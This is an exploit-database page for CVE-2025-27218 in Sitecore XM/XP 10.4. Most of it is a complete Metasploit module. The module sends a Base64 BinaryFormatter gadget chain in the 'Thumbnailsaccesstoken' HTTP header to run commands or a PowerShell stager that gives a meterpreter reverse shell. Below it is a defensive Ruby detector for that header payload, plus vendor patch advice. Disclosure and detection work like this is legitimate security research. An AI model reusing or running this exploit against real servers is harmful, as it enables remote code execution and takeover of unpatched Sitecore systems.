Sitecore CVE-2025-27218 BinaryFormatter Deserialization

Published: 28 Mar 2025. Reported by machang-r7, Dylan Pindur. Type: packetstorm. Source: packetstorm.news

Exploits Sitecore CVE-2025-27218 deserialization vulnerability via HTTP header injection.

Code
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
    
      Rank = ExcellentRanking
    
      include Msf::Util::DotNetDeserialization
      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Exploit::Powershell
      prepend Msf::Exploit::Remote::AutoCheck
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
            'Description' => %q{
              This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
              Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
            },
            'License' => MSF_LICENSE,
            'Author' => [
              'Dylan Pindur', # Discovery
              'machang-r7'    # Module Creator
            ],
            'References' => [
              ['CVE', '2025-27218'],
              ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
              ['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
            ],
            'DisclosureDate' => '2025-01-06',
            'DefaultTarget' => 0,
            'Platform' => 'win',
            'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
            'Targets' => [
              [
                'Windows Command',
                {
                  'Arch' => ARCH_CMD,
                  'Type' => :windows_command
                  # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
                }
              ],
              [
                'PowerShell Stager',
                {
                  'Arch' => [ARCH_X86, ARCH_X64],
                  'Type' => :psh_stager
                  # tested with windows/x64/meterpreter/reverse_tcp
                }
              ]
            ],
            'DefaultOptions' => {
              'RPORT' => 443,
              'SSL' => true
            },
            'Notes' => {
              'Stability' => [CRASH_SAFE],
              'Reliability' => [REPEATABLE_SESSION],
              'SideEffects' => [IOC_IN_LOGS]
            }
          )
        )
        register_options([
          OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
        ])
      end
    
      def check
        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path),
          'method' => 'GET'
        })
    
        if res&.code == 200 && res&.get_html_document&.at('//title')&.text&.strip == 'Welcome to Sitecore'
          CheckCode::Detected('The target is running SiteCore.')
        else
          CheckCode::Safe('The target does not appear to be running SiteCore.')
        end
      end
    
      def exploit
        case target['Type']
        when :windows_command
          execute_command(payload.encoded)
        when :psh_stager
          execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
        end
      end
    
      def execute_command(cmd, _opts = {})
        sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
          cmd,
          gadget_chain: :WindowsIdentity,
          formatter: :BinaryFormatter
        ))
    
        # Build HTTP request with malicious header
        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path),
          'method' => 'GET',
          'headers' => {
            'Thumbnailsaccesstoken' => sploit
          }
        })
    
        if res && res.code == 200
          print_good('Server responded with 200, this probably means it worked.')
        else
          print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
        end
      end
    end
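The module above leaves its payload in the `Thumbnailsaccesstoken` request header (hence the `IOC_IN_LOGS` note). The following is an added defensive example, not part of the Metasploit module or of Sitecore, that flags a header value decoding to a BinaryFormatter stream by checking the fixed SerializationHeaderRecord bytes of the MS-NRBF format. The header name is taken from the module; the sample request and the filler bytes after the 17-byte record are constructed and contain no gadget chain.

```ruby
require 'base64'

# Header name used by the public exploit module; HTTP header names are
# case-insensitive, so compare in lower case.
SUSPECT_HEADER = 'thumbnailsaccesstoken'

# A BinaryFormatter stream starts with a SerializationHeaderRecord:
# byte 0 = RecordTypeEnum 0x00, then RootId (4), HeaderId (4),
# MajorVersion = 1 (4 bytes, little-endian), MinorVersion = 0 (4 bytes).
def binaryformatter_stream?(raw)
  b = raw.bytes
  b.size >= 17 && b[0] == 0x00 && b[9, 4] == [1, 0, 0, 0] && b[13, 4] == [0, 0, 0, 0]
end

# True when a header value is strict Base64 that decodes to such a stream.
def binaryformatter_payload?(value)
  return false if value.nil? || value.strip.empty?
  binaryformatter_stream?(Base64.strict_decode64(value.strip))
rescue ArgumentError
  false # not valid Base64, so it cannot be the payload the module sends
end

# Inspect one request's headers (name => value) and return findings.
def inspect_headers(headers)
  headers.each_with_object([]) do |(name, value), findings|
    next unless name.to_s.downcase == SUSPECT_HEADER
    next unless binaryformatter_payload?(value)
    findings << "#{name} carries a Base64 BinaryFormatter stream (#{value.to_s.bytesize} chars); review for CVE-2025-27218"
  end
end

# Constructed sample: a valid SerializationHeaderRecord followed by filler bytes,
# not a real gadget chain. Only the 17-byte record is checked.
SAMPLE_STREAM = [0x00, 1, 0, 0, 0, 0xFF, 0xFF, 0xFF, 0xFF, 1, 0, 0, 0, 0, 0, 0, 0].pack('C*') + 'constructed-filler'.b
SAMPLE_HEADER_VALUE = Base64.strict_encode64(SAMPLE_STREAM)

# Constructed request headers: the suspect header alongside ordinary ones.
SAMPLE_REQUEST = {
  'Host' => 'sitecore.example.invalid',
  'User-Agent' => 'Mozilla/5.0',
  'Thumbnailsaccesstoken' => SAMPLE_HEADER_VALUE
}

if __FILE__ == $PROGRAM_NAME
  inspect_headers(SAMPLE_REQUEST).each { |f| puts "ALERT: #{f}" }
end
```

This check only catches the Base64 BinaryFormatter shape the module sends; patching per the Sitecore KB article remains the fix.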

Vulners AI Score: 7.3 (High risk)
CVSS 3.1: 5.3
EPSS: 0.75678